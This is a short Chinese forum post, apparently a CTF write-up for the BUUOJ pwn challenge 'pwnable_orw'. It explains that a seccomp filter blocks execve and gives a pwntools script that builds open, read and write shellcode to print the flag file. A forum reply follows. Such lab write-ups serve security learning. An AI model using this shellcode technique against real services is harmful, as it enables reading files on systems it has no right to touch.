主要在BUUOJ上面刷Pwn题,今年的目标是刷完所有的一分题;
每周会写两三道题目的WP;
pwnable_orw
checksec发现是32位
checksec
使用IDA打开看一下,主要功能是直接输入shellcode,然后执行
main函数逆向
这个题目前面有一个orw_seccomp函数,这个函数内部调用了seccomp
这是一个之前没听过的概念,会进入linux的一个高安全模式,这种模式下不能执行execve这样的系统调用;
只能执行read、write、open这些
所以这边写脚本需要用shellcraft自己写shellcode,不能直接用sh这样
from pwn import *
io = process('./orw')
elf = ELF('./orw')
payload = asm(shellcraft.open('flag'))
payload += asm(shellcraft.read(3,'esp',100))
payload += asm(shellcraft.write(1,'esp',100))
io.sendline(payload)
io.interactive()
| 
[复制链接]
发表于 2020-12-20 19:04
感谢分享 
